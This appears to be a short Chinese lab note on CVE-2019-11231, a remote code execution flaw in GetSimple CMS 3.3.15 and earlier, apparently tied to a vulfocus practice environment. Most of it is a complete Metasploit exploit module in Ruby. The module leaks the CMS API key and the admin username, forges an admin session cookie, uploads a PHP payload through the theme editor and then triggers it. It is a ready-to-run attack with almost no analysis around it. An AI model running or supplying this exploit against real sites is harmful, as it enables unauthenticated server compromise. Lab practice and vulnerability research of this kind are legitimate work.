Skip to content

Latest commit

 

History

History
200 lines (170 loc) · 6.11 KB

getsimple 远程代码执行 (CVE-2019-11231).md

File metadata and controls

200 lines (170 loc) · 6.11 KB

名称: getsimple 远程代码执行 (CVE-2019-11231)

描述: vulfocus/getsimple-cve_2019_11231

漏洞详情

GetSimple CMS是一套使用PHP语言编写的内容管理系统(CMS)。 GetSimpleCMS 3.3.15及之前版本中存在远程代码执行漏洞。远程攻击者可利用该漏洞在受影响系统上执行任意的PHP代码。

直接msf搜CVE-2019-11231

image-20211117182127262

ms攻击代码如下

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "GetSimpleCMS Unauthenticated RCE",
      'Description'    => %q{
        This module exploits a vulnerability found in GetSimpleCMS,
        which allows unauthenticated attackers to perform Remote Code Execution.
        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
        however authentication can be bypassed by leaking the cms API key to target the session manager.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
        ],
      'References'     =>
        [
          ['CVE', '2019-11231'],
          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['GetSimpleCMS 3.3.15 and before', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 28 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
      ])
  end

  def gscms_version
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
      )
      return unless res && res.code == 200

      generator = res.get_html_document.at(
        '//script[@type = "text/javascript"]/@src'
        )

      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
      vers = generator.value.split('?v=').last.gsub(".","")
      return unless vers
      @version = vers
  end

  def get_salt
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
    @salt = res.get_xml_document.at('apikey').text
  end

  def get_user
    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
  end

  def gen_cookie(version,salt,username)
    cookie_name = "getsimple_cookie_#{version}"
    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")

    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
  end
  def get_nonce(cookie)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
      'cookie' =>  cookie,
      'vars_get' => {
          't' => 'Innovation',
          'f' => 'Default Template',
          's' => 'Edit'
      }
    })

    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
  end

  def exploit
    unless check == CheckCode::Vulnerable
        fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
    end
    version = gscms_version
    salt = get_salt
    username = get_user
    cookie = gen_cookie(version,salt,username)
    nonce = get_nonce(cookie)

    fname = "#{rand_text_alpha(6..16)}.php"
    php   = %Q|<?php #{payload.encoded} ?>|
    upload_file(cookie,nonce,fname,php)
    send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path,'theme',fname),
    })
  end

  def check
    version = gscms_version
    unless version
        return CheckCode::Safe
    end
    vprint_status "GetSimpleCMS version #{version}"
    unless vulnerable
        return CheckCode::Detected
    end
    CheckCode::Vulnerable
  end

  def vulnerable
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200
    return true
  end

  def upload_file(cookie,nonce,fname,content)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path,'admin','theme-edit.php'),
      'cookie'    => cookie,
      'vars_post' => {
        'submitsave'    => 2,
        'edited_file' => fname,
        'content' => content,
        'nonce' => nonce
      }
    })
  end
end

![image-20211117182800498](C:\Users\e'e't\AppData\Roaming\Typora\typora-user-images\image-20211117182800498.png

ok